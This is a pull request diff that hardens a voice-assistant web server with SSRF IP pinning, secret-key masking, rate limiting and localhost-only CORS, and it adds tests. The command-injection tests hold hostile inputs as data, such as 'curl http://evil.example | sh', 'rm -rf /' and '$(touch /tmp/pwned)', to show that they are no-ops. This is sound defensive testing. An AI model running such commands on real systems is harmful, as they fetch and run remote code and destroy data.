### PR TITLE
Batch 1: voice-test e2e + security backlog (verify-then-fix all 6 topics)

### DIFF
--- a/.env.example
+++ b/.env.example
@@ -33,6 +33,7 @@
 
 # --- Web server / bridge ---
 # CHATTY_ENV=production                            # production refuses --no-auth (web/server.py)
+# CHATTY_CORS_ORIGINS=http://localhost:3000        # comma-separated browser origins allowed by CORS; defaults to localhost-only (esp. in --no-auth mode)
 # CHATTY_BRIDGE_TOKEN=your-bridge-token            # auth token for the /bridge endpoint (overrides web_server.bridge_token)
 # CHATBOT_ENDPOINT=https://your-chatbot-server.example.com/   # override chatbot API endpoint
 # HOME_ASSISTANT_ENDPOINT=http://homeassistant.local:8123/api # override Home Assistant endpoint

--- a/Dockerfile
+++ b/Dockerfile
@@ -59,9 +59,13 @@ COPY config.json config.json.example ./
 # models-* are wakeword model locations referenced by config.json; mount real
 # models over them (see docker-compose.yml volumes).
 RUN mkdir -p /app/logs /app/data /app/models /app/uploads \
-        /app/models-idle /app/models-computer /app/models-chatty && \
+        /app/models-idle /app/models-computer /app/models-chatty \
+        /app/wakewords && \
     chown chatty:chatty /app/logs /app/data /app/models /app/uploads \
-        /app/models-idle /app/models-computer /app/models-chatty
+        /app/models-idle /app/models-computer /app/models-chatty \
+        /app/wakewords && \
+    # First-run default-config generation rewrites config.json in the workdir.
+    chown chatty:chatty /app/config.json
 
 USER chatty
 

--- a/src/chatty_commander/advisors/tools/browser_analyst.py
+++ b/src/chatty_commander/advisors/tools/browser_analyst.py
@@ -31,7 +31,7 @@ import re
 from urllib.parse import urlparse
 
 from chatty_commander.app.config import Config
-from chatty_commander.utils.url_validator import is_safe_url
+from chatty_commander.utils.url_validator import resolve_safe_url
 
 try:
     from agents import FunctionTool
@@ -86,14 +86,25 @@ def browser_analyst_tool(url: str) -> str:
             logger.warning(f"Domain {hostname} is not in the allowlist.")
             return f"Error: Domain {hostname} is not allowed."
 
-        if not is_safe_url(url):
+        # Validate and PIN the URL to its resolved IP: fetching the pinned
+        # URL closes the DNS-rebinding TOCTOU window (no second DNS lookup
+        # between validation and connect). See utils/url_validator.PinnedURL.
+        pinned = resolve_safe_url(url)
+        if pinned is None:
             logger.warning(f"SSRF blocked: URL resolves to private/internal address: {url}")
             return "Error: URL blocked — resolves to internal address."
 
         # Prevent DoS via memory exhaustion with a 2MB limit
         MAX_SIZE = 2 * 1024 * 1024
         text = ""
-        with httpx.stream("GET", url, timeout=timeout, follow_redirects=False) as response:
+        with httpx.stream(
+            "GET",
+            pinned.url,
+            headers={"Host": pinned.host_header},
+            extensions={"sni_hostname": pinned.sni_hostname},
+            timeout=timeout,
+            follow_redirects=False,
+        ) as response:
             response.raise_for_status()
             content_pieces = []
             size = 0

--- a/src/chatty_commander/utils/security.py
+++ b/src/chatty_commander/utils/security.py
@@ -20,6 +20,7 @@
 # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 # SOFTWARE.
 
+import re
 import secrets
 from typing import Any
 
@@ -38,25 +39,41 @@ def constant_time_compare(provided: str | None, expected: str | None) -> bool:
     )
 
 
-def mask_sensitive_data(data: Any) -> Any:
-    """Recursively mask sensitive keys in a dictionary or list."""
-    sensitive_patterns = {
-        "api_key",
-        "api_token",
-        "access_token",
-        "auth_token",
-        "bridge_token",
+# Patterns are matched against keys normalized to lowercase alphanumerics,
+# so "Api-Key", "apiKey", "API KEY" and "api_key" all reduce to "apikey".
+_SENSITIVE_KEY_PATTERNS = frozenset(
+    {
+        "apikey",
+        "apitoken",
+        "accesstoken",
+        "authtoken",
+        "bridgetoken",
         "password",
         "passwd",
         "secret",
-        "database_url",
+        "databaseurl",
         "token",
     }
+)
 
+_KEY_NORMALIZE_RE = re.compile(r"[^a-z0-9]+")
+
+
+def _is_sensitive_key(key: Any) -> bool:
+    normalized = _KEY_NORMALIZE_RE.sub("", str(key).lower())
+    return any(p in normalized for p in _SENSITIVE_KEY_PATTERNS)
+
+
+def mask_sensitive_data(data: Any) -> Any:
+    """Recursively mask sensitive keys in dicts, lists and tuples.
+
+    Keys are matched case-insensitively and separator-insensitively, so
+    variants like "Api-Key", "apiKey" and "API KEY" cannot bypass masking.
+    """
     if isinstance(data, dict):
         masked = {}
         for k, v in data.items():
-            if any(p in str(k).lower() for p in sensitive_patterns):
+            if _is_sensitive_key(k):
                 masked[k] = "********"
             elif str(k).lower() == "auth":
                 # Special case for 'auth' which often contains credentials
@@ -69,4 +86,6 @@ def mask_sensitive_data(data: Any) -> Any:
         return masked
     elif isinstance(data, list):
         return [mask_sensitive_data(item) for item in data]
+    elif isinstance(data, tuple):
+        return tuple(mask_sensitive_data(item) for item in data)
     return data

--- a/src/chatty_commander/utils/url_validator.py
+++ b/src/chatty_commander/utils/url_validator.py
@@ -1,7 +1,8 @@
 import ipaddress
 import logging
 import socket
-from urllib.parse import urlparse
+from dataclasses import dataclass
+from urllib.parse import urlparse, urlunparse
 
 logger = logging.getLogger(__name__)
 
@@ -21,6 +22,103 @@ def _is_restricted(ip_str: str) -> bool:
     )
 
 
+@dataclass(frozen=True)
+class PinnedURL:
+    """A validated URL pinned to the IP address that passed validation.
+
+    Connecting to ``url`` (whose host is an IP literal) instead of the
+    original URL closes the DNS-rebinding TOCTOU window: the fetch can no
+    longer re-resolve the hostname to a different (internal) address after
+    validation.
+
+    Usage with httpx (works for both HTTP and HTTPS; ``sni_hostname`` makes
+    TLS SNI and certificate verification use the original hostname)::
+
+        pinned = resolve_safe_url(url)
+        if pinned is None:
+            ...  # reject
+        client.get(
+            pinned.url,
+            headers={"Host": pinned.host_header},
+            extensions={"sni_hostname": pinned.sni_hostname},
+        )
+    """
+
+    url: str
+    """The original URL with its host replaced by the validated IP literal."""
+    ip: str
+    """The validated IP address the connection should be made to."""
+    host_header: str
+    """Value for the HTTP ``Host`` header (original host, plus explicit port)."""
+    sni_hostname: str
+    """Original hostname, for TLS SNI / certificate verification."""
+
+
+def resolve_safe_url(url: str) -> PinnedURL | None:
+    """
+    Validate a URL against SSRF and return it pinned to the resolved IP.
+
+    Resolves the hostname once, requires ALL resolved addresses (IPv4 and
+    IPv6) to be non-restricted, and returns a :class:`PinnedURL` whose host
+    is one of the validated IP literals. Fetching the pinned URL cannot be
+    redirected by DNS rebinding because no second DNS lookup takes place.
+
+    Returns ``None`` (fail closed) for disallowed schemes, missing/invalid
+    hosts, resolution failures, or any restricted resolved address.
+
+    Note: any userinfo (``user:pass@``) in the URL is dropped from the
+    pinned URL.
+    """
+    try:
+        parsed = urlparse(url)
+        if parsed.scheme not in _ALLOWED_SCHEMES:
+            return None
+        hostname = parsed.hostname
+        if not hostname:
+            return None
+        port = parsed.port  # raises ValueError for out-of-range ports
+
+        # Resolve all addresses (IPv4 + IPv6)
+        try:
+            addr_infos = socket.getaddrinfo(
+                hostname,
+                port or (443 if parsed.scheme == "https" else 80),
+                proto=socket.IPPROTO_TCP,
+            )
+        except (socket.gaierror, TimeoutError):
+            return None
+
+        if not addr_infos:
+            return None
+
+        # ALL resolved addresses must be safe (multi-record bypass guard)
+        ips: list[str] = []
+        for _family, _type, _proto, _canonname, sockaddr in addr_infos:
+            ip_str = sockaddr[0]
+            assert isinstance(ip_str, str)  # sockaddr[0] is always an IP string
+            if _is_restricted(ip_str):
+                return None
+            ips.append(ip_str)
+
+        pinned_ip = ips[0]
+        url_host = f"[{pinned_ip}]" if ":" in pinned_ip else pinned_ip
+        netloc = url_host if port is None else f"{url_host}:{port}"
+        header_host = f"[{hostname}]" if ":" in hostname else hostname
+        host_header = header_host if port is None else f"{header_host}:{port}"
+        return PinnedURL(
+            url=urlunparse(parsed._replace(netloc=netloc)),
+            ip=pinned_ip,
+            host_header=host_header,
+            sni_hostname=hostname,
+        )
+    except Exception as e:
+        # Fail closed (treat as unsafe), but surface unexpected errors so an
+        # operator can notice resolver/parsing problems rather than silently
+        # rejecting (or, worse, masking) URLs.
+        logger.warning("URL safety check failed unexpectedly for %r: %s", url, e)
+        return None
+
+
 def is_safe_url(url: str) -> bool:
     """
     Validates a URL to prevent SSRF by resolving its hostname and
@@ -28,35 +126,12 @@ def is_safe_url(url: str) -> bool:
 
     Uses getaddrinfo to check ALL resolved addresses (IPv4 and IPv6),
     closing the multi-A-record bypass window.
+
+    WARNING (TOCTOU / DNS rebinding): this check resolves the hostname, but
+    a subsequent fetch of the original URL performs its own DNS lookup. An
+    attacker-controlled, low-TTL domain can pass this check and then
+    re-resolve to an internal address at connect time. Callers fetching
+    untrusted URLs should use :func:`resolve_safe_url` and connect to the
+    pinned IP instead of re-fetching the hostname URL.
     """
-    try:
-        parsed = urlparse(url)
-        if parsed.scheme not in _ALLOWED_SCHEMES:
-            return False
-        hostname = parsed.hostname
-        if not hostname:
-            return False
-
-        # Resolve all addresses (IPv4 + IPv6)
-        try:
-            addr_infos = socket.getaddrinfo(hostname, None)
-        except (socket.gaierror, TimeoutError):
-            return False
-
-        if not addr_infos:
-            return False
-
-        # ALL resolved addresses must be safe
-        for _family, _type, _proto, _canonname, sockaddr in addr_infos:
-            ip_str = sockaddr[0]
-            assert isinstance(ip_str, str)  # sockaddr[0] is always an IP string
-            if _is_restricted(ip_str):
-                return False
-
-        return True
-    except Exception as e:
-        # Fail closed (treat as unsafe), but surface unexpected errors so an
-        # operator can notice resolver/parsing problems rather than silently
-        # rejecting (or, worse, masking) URLs.
-        logger.warning("URL safety check failed unexpectedly for %r: %s", url, e)
-        return False
+    return resolve_safe_url(url) is not None

--- a/src/chatty_commander/web/routes/core.py
+++ b/src/chatty_commander/web/routes/core.py
@@ -40,6 +40,109 @@ from chatty_commander.utils.security import mask_sensitive_data
 
 logger = logging.getLogger(__name__)
 
+#: Default per-caller budget for POST /api/v1/command (requests per minute).
+DEFAULT_COMMAND_RATE_LIMIT_PER_MINUTE = 30.0
+
+#: Env values for CHATCOMM_COMMAND_RATE_LIMIT that disable rate limiting.
+_RATE_LIMIT_DISABLED_VALUES = frozenset({"0", "off", "false", "disabled", "none"})
+
+
+def _resolve_command_rate_limit() -> float | None:
+    """Resolve the command-endpoint rate limit (requests/minute) from the env.
+
+    - ``CHATCOMM_COMMAND_RATE_LIMIT=<n>`` sets the limit explicitly.
+    - ``CHATCOMM_COMMAND_RATE_LIMIT=0|off|false|disabled|none`` disables it.
+    - Unset: defaults to :data:`DEFAULT_COMMAND_RATE_LIMIT_PER_MINUTE`, except
+      under pytest (``PYTEST_CURRENT_TEST`` present) where it is disabled so
+      existing tests hammering the endpoint stay deterministic.
+
+    Returns the limit in requests per minute, or ``None`` when disabled.
+    """
+    raw = os.environ.get("CHATCOMM_COMMAND_RATE_LIMIT")
+    if raw is not None:
+        value_str = raw.strip().lower()
+        if value_str in _RATE_LIMIT_DISABLED_VALUES:
+            return None
+        try:
+            value = float(value_str)
+        except ValueError:
+            logger.warning(
+                "Invalid CHATCOMM_COMMAND_RATE_LIMIT %r; using default %s/min",
+                raw,
+                DEFAULT_COMMAND_RATE_LIMIT_PER_MINUTE,
+            )
+            return DEFAULT_COMMAND_RATE_LIMIT_PER_MINUTE
+        return value if value > 0 else None
+    if os.environ.get("PYTEST_CURRENT_TEST"):
+        return None
+    return DEFAULT_COMMAND_RATE_LIMIT_PER_MINUTE
+
+
+class TokenBucketRateLimiter:
+    """Dependency-free, thread-safe in-memory token bucket, keyed per caller.
+
+    Each key gets a bucket of ``capacity`` tokens (defaults to the per-minute
+    rate, i.e. the full minute budget may be spent as a burst) refilled at
+    ``rate_per_minute / 60`` tokens per second.
+    """
+
+    def __init__(
+        self,
+        rate_per_minute: float,
+        *,
+        burst: float | None = None,
+        time_fn: Callable[[], float] = time.monotonic,
+        max_keys: int = 1024,
+    ) -> None:
+        if rate_per_minute <= 0:
+            raise ValueError("rate_per_minute must be positive")
+        self.rate = rate_per_minute / 60.0
+        self.capacity = float(burst) if burst is not None else max(1.0, rate_per_minute)
+        self._time_fn = time_fn
+        self._max_keys = max_keys
+        self._lock = threading.Lock()
+        # key -> (tokens, last_update_timestamp)
+        self._buckets: dict[str, tuple[float, float]] = {}
+
+    def try_acquire(self, key: str) -> tuple[bool, float]:
+        """Consume one token for ``key``.
+
+        Returns ``(allowed, retry_after_seconds)``; ``retry_after_seconds`` is
+        0.0 when allowed.
+        """
+        now = self._time_fn()
+        with self._lock:
+            tokens, last = self._buckets.get(key, (self.capacity, now))
+            tokens = min(self.capacity, tokens + (now - last) * self.rate)
+            if tokens >= 1.0:
+                self._buckets[key] = (tokens - 1.0, now)
+                self._prune_locked(now)
+                return True, 0.0
+            self._buckets[key] = (tokens, now)
+            return False, (1.0 - tokens) / self.rate
+
+    def _prune_locked(self, now: float) -> None:
+        """Drop fully-refilled (idle) buckets once the table grows too large."""
+        if len(self._buckets) <= self._max_keys:
+            return
+        stale = [
+            key
+            for key, (tokens, last) in self._buckets.items()
+            if tokens + (now - last) * self.rate >= self.capacity
+        ]
+        for key in stale:
+            del self._buckets[key]
+
+
+def _rate_limit_key(request: Request) -> str:
+    """Identify the caller: API key when provided, client IP otherwise."""
+    api_key = request.headers.get("X-API-Key")
+    if api_key:
+        return f"key:{api_key}"
+    client = request.client
+    return f"ip:{client.host if client else 'unknown'}"
+
+
 ALLOWED_CONFIG_KEYS = frozenset(
     {
         "general",
@@ -390,9 +493,27 @@ def include_core_routes(
         except Exception as err:
             raise HTTPException(status_code=400, detail=str(err)) from err
 
+    # Per-router token bucket for the command endpoint. Resolved once at
+    # router construction; None means rate limiting is disabled (the default
+    # under pytest — see _resolve_command_rate_limit).
+    _command_rate = _resolve_command_rate_limit()
+    command_rate_limiter = (
+        TokenBucketRateLimiter(_command_rate) if _command_rate is not None else None
+    )
+
     @router.post("/api/v1/command", response_model=CommandResponse)
-    async def execute_command(request: CommandRequest):
+    async def execute_command(request: CommandRequest, http_request: Request):
         counters["command_post"] += 1
+        if command_rate_limiter is not None:
+            allowed, retry_after = command_rate_limiter.try_acquire(
+                _rate_limit_key(http_request)
+            )
+            if not allowed:
+                raise HTTPException(
+                    status_code=429,
+                    detail="Rate limit exceeded for command execution",
+                    headers={"Retry-After": str(max(1, int(retry_after + 0.999)))},
+                )
         start_time = time.time()
         try:
             # Delegate to provided executor bridge to ensure consistent integration surface

--- a/src/chatty_commander/web/web_mode.py
+++ b/src/chatty_commander/web/web_mode.py
@@ -130,8 +130,10 @@ class SecurityHeadersMiddleware(BaseHTTPMiddleware):
         response.headers["X-Content-Type-Options"] = "nosniff"
         response.headers["X-Frame-Options"] = "DENY"
         response.headers["Referrer-Policy"] = "strict-origin-when-cross-origin"
+        # microphone=(self) so the Voice Test page can call getUserMedia;
+        # everything else stays denied.
         response.headers["Permissions-Policy"] = (
-            "geolocation=(), microphone=(), camera=()"
+            "geolocation=(), microphone=(self), camera=()"
         )
         response.headers["Content-Security-Policy"] = (
             "default-src 'self'; "
@@ -589,9 +591,36 @@ class WebModeServer:
 
         app.add_middleware(ResponseTimeMiddleware)
 
-        # CORS policy — delegate to shared apply_cors() for consistency
+        # CORS policy — delegate to shared apply_cors() for consistency.
+        # SECURITY: even in no_auth (dev) mode the allowlist stays pinned to
+        # localhost origins. no_auth disables authentication entirely, so a
+        # wildcard origin would let any website the user happens to visit
+        # drive this API from their browser and read the responses
+        # (drive-by attack against the local machine). Override with
+        # CHATTY_CORS_ORIGINS (comma-separated origins) when a non-localhost
+        # origin is genuinely required.
+        import os
+
         from chatty_commander.web.auth import apply_cors
-        apply_cors(app, no_auth=self.no_auth)
+
+        env_origins = os.environ.get("CHATTY_CORS_ORIGINS", "").strip()
+        if env_origins:
+            cors_origins = [o.strip() for o in env_origins.split(",") if o.strip()]
+        elif self.no_auth:
+            # Localhost-only defaults covering the bundled frontend dev
+            # server (vite on :3000) and the API port itself (:8100).
+            cors_origins = [
+                "http://localhost:3000",
+                "http://127.0.0.1:3000",
+                "http://localhost:8100",
+                "http://127.0.0.1:8100",
+            ]
+        else:
+            cors_origins = ["http://localhost:3000"]
+        # no_auth=False is deliberate: apply_cors(no_auth=True) hardcodes a
+        # wildcard; passing the explicit origin list keeps it restricted
+        # (apply_cors still disables credentials if "*" is supplied via env).
+        apply_cors(app, no_auth=False, origins=cors_origins)
 
         # Core REST via extracted router (status/config/state/command)
         core = include_core_routes(

--- a/tests/test_command_injection_web_path.py
+++ b/tests/test_command_injection_web_path.py
@@ -1,0 +1,179 @@
+# MIT License
+#
+# Copyright (c) 2024 mhand
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Pin the command-injection posture of the /api/v1/command web path.
+
+Topic from bot PRs #631/#632/#640: can a web caller influence the shell
+string (or keypress/url arguments) of an executed command, beyond selecting
+a pre-configured command by name?
+
+These tests prove the answer is NO with the current code:
+
+- the endpoint passes only ``request.command`` (a name) to the executor;
+- the executor looks that name up in config-defined ``model_actions`` and
+  returns False (no-op) for anything not configured;
+- the ``parameters`` field of the request body is never forwarded;
+- shell actions execute via ``shlex.split`` + ``subprocess.run`` with an
+  argv list and no ``shell=True``, so even config-sourced metacharacters
+  are not interpreted by a shell.
+"""
+
+import shlex
+import subprocess
+from datetime import datetime
+from types import SimpleNamespace
+from unittest.mock import MagicMock, patch
+
+import pytest
+from fastapi import FastAPI
+from fastapi.testclient import TestClient
+
+from chatty_commander.app.command_executor import CommandExecutor
+from chatty_commander.web.routes.core import include_core_routes
+
+CONFIGURED_SHELL_CMD = "echo hello"
+
+
+def _make_executor() -> CommandExecutor:
+    """Real CommandExecutor over a minimal config, mirroring web_mode wiring."""
+    config = SimpleNamespace(
+        model_actions={
+            "hello": {"action": "shell", "cmd": CONFIGURED_SHELL_CMD},
+            "press": {"action": "keypress", "keys": "ctrl+alt+t"},
+        }
+    )
+    return CommandExecutor(
+        config=config, model_manager=MagicMock(), state_manager=MagicMock()
+    )
+
+
+@pytest.fixture()
+def client() -> TestClient:
+    executor = _make_executor()
+    app = FastAPI()
+    router = include_core_routes(
+        get_start_time=lambda: 0.0,
+        get_state_manager=lambda: MagicMock(),
+        get_config_manager=lambda: MagicMock(),
+        get_last_command=lambda: None,
+        get_last_state_change=datetime.now,
+        execute_command_fn=executor.execute_command,
+    )
+    app.include_router(router)
+    return TestClient(app)
+
+
+@pytest.mark.parametrize(
+    "payload_name",
+    [
+        "hello; touch /tmp/pwned",
+        "hello && curl http://evil.example",
+        "$(touch /tmp/pwned)",
+        "`id`",
+        "../../bin/sh -c id",
+        "rm -rf /",
+        "hello | tee /etc/passwd",
+    ],
+)
+def test_injection_shaped_command_names_are_noops(client, payload_name):
+    """Arbitrary strings are not executed: name lookup fails, nothing runs."""
+    with patch("chatty_commander.app.command_executor.subprocess.run") as mock_run:
+        resp = client.post("/api/v1/command", json={"command": payload_name})
+
+    assert resp.status_code == 200
+    body = resp.json()
+    assert body["success"] is False
+    assert "no-op" in body["message"]
+    mock_run.assert_not_called()
+
+
+def test_parameters_field_cannot_alter_configured_shell_command(client):
+    """The request 'parameters' dict is accepted but never reaches the executor."""
+    completed = subprocess.CompletedProcess(
+        args=shlex.split(CONFIGURED_SHELL_CMD), returncode=0, stdout="hello", stderr=""
+    )
+    with patch(
+        "chatty_commander.app.command_executor.subprocess.run",
+        return_value=completed,
+    ) as mock_run:
+        resp = client.post(
+            "/api/v1/command",
+            json={
+                "command": "hello",
+                "parameters": {
+                    "cmd": "curl http://evil.example | sh",
+                    "keys": "ctrl+alt+del",
+                    "url": "http://evil.example",
+                },
+            },
+        )
+
+    assert resp.status_code == 200
+    assert resp.json()["success"] is True
+    mock_run.assert_called_once()
+    args, kwargs = mock_run.call_args
+    # Exactly the config-defined argv; nothing from the request body leaked in.
+    assert args[0] == shlex.split(CONFIGURED_SHELL_CMD)
+    assert kwargs.get("shell") is not True
+
+
+def test_extra_request_body_fields_are_rejected(client):
+    """CommandRequest forbids extra fields, closing smuggling via the body."""
+    resp = client.post(
+        "/api/v1/command",
+        json={"command": "hello", "shell": "rm -rf /", "cmd": "id"},
+    )
+    assert resp.status_code == 422
+
+
+def test_keypress_args_come_only_from_config(client):
+    """Keypress actions use config-defined keys, never request input."""
+    with patch("chatty_commander.app.command_executor.pyautogui") as mock_pg:
+        resp = client.post(
+            "/api/v1/command",
+            json={"command": "press", "parameters": {"keys": "ctrl+alt+del"}},
+        )
+    assert resp.status_code == 200
+    assert resp.json()["success"] is True
+    mock_pg.hotkey.assert_called_once_with("ctrl", "alt", "t")
+
+
+def test_shell_action_executes_without_shell_interpretation():
+    """Even config-sourced metacharacters get argv semantics, not shell ones."""
+    config = SimpleNamespace(
+        model_actions={"meta": {"action": "shell", "cmd": "echo hi; touch pwned"}}
+    )
+    executor = CommandExecutor(
+        config=config, model_manager=MagicMock(), state_manager=MagicMock()
+    )
+    completed = subprocess.CompletedProcess(args=[], returncode=0, stdout="", stderr="")
+    with patch(
+        "chatty_commander.app.command_executor.subprocess.run",
+        return_value=completed,
+    ) as mock_run:
+        assert executor.execute_command("meta") is True
+
+    args, kwargs = mock_run.call_args
+    # Passed as an argv list (shlex.split), so ';' is a literal argument...
+    assert args[0] == ["echo", "hi;", "touch", "pwned"]
+    # ...and no shell is involved to reinterpret it.
+    assert kwargs.get("shell") is not True

--- a/tests/test_command_rate_limit.py
+++ b/tests/test_command_rate_limit.py
@@ -1,0 +1,238 @@
+# MIT License
+#
+# Copyright (c) 2024 mhand
+#
+# Permission is hereby granted, free of charge, to any person obtaining a copy
+# of this software and associated documentation files (the "Software"), to deal
+# in the Software without restriction, including without limitation the rights
+# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+# copies of the Software, and to permit persons to whom the Software is
+# furnished to do so, subject to the following conditions:
+#
+# The above copyright notice and this permission notice shall be included in all
+# copies or substantial portions of the Software.
+#
+# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+# SOFTWARE.
+
+"""Rate limiting on POST /api/v1/command (topic from bot PR #639).
+
+Covers the dependency-free in-memory token bucket and its wiring into the
+command endpoint: per-key budgets, refill over time, 429 + Retry-After on
+exhaustion, env-based configuration, and the default-off behavior under
+pytest so existing suites are unaffected.
+"""
+
+from datetime import datetime
+from types import SimpleNamespace
+from unittest.mock import MagicMock
+
+import pytest
+from fastapi import FastAPI
+from fastapi.testclient import TestClient
+
+from chatty_commander.web.routes.core import (
+    DEFAULT_COMMAND_RATE_LIMIT_PER_MINUTE,
+    TokenBucketRateLimiter,
+    _resolve_command_rate_limit,
+    include_core_routes,
+)
+
+# ---------------------------------------------------------------------------
+# Token bucket unit tests
+# ---------------------------------------------------------------------------
+
+
+class FakeClock:
+    def __init__(self) -> None:
+        self.now = 1000.0
+
+    def __call__(self) -> float:
+        return self.now
+
+    def advance(self, seconds: float) -> None:
+        self.now += seconds
+
+
+def test_bucket_allows_burst_then_denies():
+    clock = FakeClock()
+    limiter = TokenBucketRateLimiter(3, time_fn=clock)
+    assert all(limiter.try_acquire("k")[0] for _ in range(3))
+    allowed, retry_after = limiter.try_acquire("k")
+    assert allowed is False
+    assert retry_after > 0
+
+
+def test_bucket_refills_over_time():
+    clock = FakeClock()
+    limiter = TokenBucketRateLimiter(60, time_fn=clock)  # 1 token/second
+    for _ in range(60):
+        assert limiter.try_acquire("k")[0]
+    assert limiter.try_acquire("k")[0] is False
+    clock.advance(1.0)  # exactly one token refilled
+    assert limiter.try_acquire("k")[0] is True
+    assert limiter.try_acquire("k")[0] is False
+
+
+def test_bucket_keys_are_independent():
+    clock = FakeClock()
+    limiter = TokenBucketRateLimiter(1, time_fn=clock)
+    assert limiter.try_acquire("a")[0] is True
+    assert limiter.try_acquire("a")[0] is False
+    assert limiter.try_acquire("b")[0] is True
+
+
+def test_bucket_retry_after_matches_refill_rate():
+    clock = FakeClock()
+    limiter = TokenBucketRateLimiter(60, time_fn=clock)  # 1 token/second
+    for _ in range(60):
+        limiter.try_acquire("k")
+    _, retry_after = limiter.try_acquire("k")
+    # Plain tolerance check (not pytest.approx: other suites leave a stubbed
+    # numpy module in sys.modules which breaks approx's numpy detection).
+    assert abs(retry_after - 1.0) < 1e-9
+
+
+def test_bucket_prunes_idle_keys():
+    clock = FakeClock()
+    limiter = TokenBucketRateLimiter(60, time_fn=clock, max_keys=10)
+    for i in range(10):
+        limiter.try_acquire(f"old-{i}")
+    clock.advance(120.0)  # all old buckets fully refilled -> prunable
+    limiter.try_acquire("new")
+    assert len(limiter._buckets) <= 11
+    assert "new" in limiter._buckets
+    assert not any(k.startswith("old-") for k in limiter._buckets)
+
+
+def test_bucket_rejects_nonpositive_rate():
+    with pytest.raises(ValueError):
+        TokenBucketRateLimiter(0)
+
+
+# ---------------------------------------------------------------------------
+# Env resolution
+# ---------------------------------------------------------------------------
+
+
+def test_resolve_explicit_limit(monkeypatch):
+    monkeypatch.setenv("CHATCOMM_COMMAND_RATE_LIMIT", "12")
+    assert _resolve_command_rate_limit() == 12.0
+
+
+@pytest.mark.parametrize("value", ["0", "off", "OFF", "false", "disabled", "none"])
+def test_resolve_disabled_values(monkeypatch, value):
+    monkeypatch.setenv("CHATCOMM_COMMAND_RATE_LIMIT", value)
+    assert _resolve_command_rate_limit() is None
+
+
+def test_resolve_invalid_value_falls_back_to_default(monkeypatch):
+    monkeypatch.setenv("CHATCOMM_COMMAND_RATE_LIMIT", "not-a-number")
+    assert _resolve_command_rate_limit() == DEFAULT_COMMAND_RATE_LIMIT_PER_MINUTE
+
+
+def test_resolve_unset_disabled_under_pytest(monkeypatch):
+    monkeypatch.delenv("CHATCOMM_COMMAND_RATE_LIMIT", raising=False)
+    # PYTEST_CURRENT_TEST is set by pytest itself while this test runs.
+    assert _resolve_command_rate_limit() is None
+
+
+def test_resolve_unset_defaults_outside_test_mode(monkeypatch):
+    monkeypatch.delenv("CHATCOMM_COMMAND_RATE_LIMIT", raising=False)
+    monkeypatch.delenv("PYTEST_CURRENT_TEST", raising=False)
+    assert _resolve_command_rate_limit() == DEFAULT_COMMAND_RATE_LIMIT_PER_MINUTE
+
+
+# ---------------------------------------------------------------------------
+# Endpoint integration
+# ---------------------------------------------------------------------------
+
+
+def _make_client() -> TestClient:
+    app = FastAPI()
+    state_manager = SimpleNamespace(current_state="idle", get_active_models=lambda: [])
+    router = include_core_routes(
+        get_start_time=lambda: 0.0,
+        get_state_manager=lambda: state_manager,
+        get_config_manager=lambda: MagicMock(),
+        get_last_command=lambda: None,
+        get_last_state_change=datetime.now,
+        execute_command_fn=lambda name: True,
+    )
+    app.include_router(router)
+    return TestClient(app)
+
+
+def test_endpoint_returns_429_after_limit(monkeypatch):
+    monkeypatch.setenv("CHATCOMM_COMMAND_RATE_LIMIT", "3")
+    client = _make_client()
+    for _ in range(3):
+        resp = client.post("/api/v1/command", json={"command": "hello"})
+        assert resp.status_code == 200
+        assert resp.json()["success"] is True
+    resp = client.post("/api/v1/command", json={"command": "hello"})
+    assert resp.status_code == 429
+    assert "Rate limit" in resp.json()["detail"]
+    assert int(resp.headers["Retry-After"]) >= 1
+
+
+def test_endpoint_rate_limit_is_per_api_key(monkeypatch):
+    monkeypatch.setenv("CHATCOMM_COMMAND_RATE_LIMIT", "1")
+    client = _make_client()
+    assert (
+        client.post(
+            "/api/v1/command",
+            json={"command": "a"},
+            headers={"X-API-Key": "alice"},
+        ).status_code
+        == 200
+    )
+    assert (
+        client.post(
+            "/api/v1/command",
+            json={"command": "a"},
+            headers={"X-API-Key": "alice"},
+        ).status_code
+        == 429
+    )
+    # A different key has its own budget.
+    assert (
+        client.post(
+            "/api/v1/command",
+            json={"command": "a"},
+            headers={"X-API-Key": "bob"},
+        ).status_code
+        == 200
+    )
+
+
+def test_endpoint_unlimited_by_default_under_pytest(monkeypatch):
+    monkeypatch.delenv("CHATCOMM_COMMAND_RATE_LIMIT", raising=False)
+    client = _make_client()
+    for _ in range(50):
+        resp = client.post("/api/v1/command", json={"command": "hello"})
+        assert resp.status_code == 200
+
+
+def test_endpoint_explicit_off_disables_limit(monkeypatch):
+    monkeypatch.setenv("CHATCOMM_COMMAND_RATE_LIMIT", "off")
+    client = _make_client()
+    for _ in range(50):
+        resp = client.post("/api/v1/command", json={"command": "hello"})
+        assert resp.status_code == 200
+
+
+def test_other_endpoints_not_rate_limited(monkeypatch):
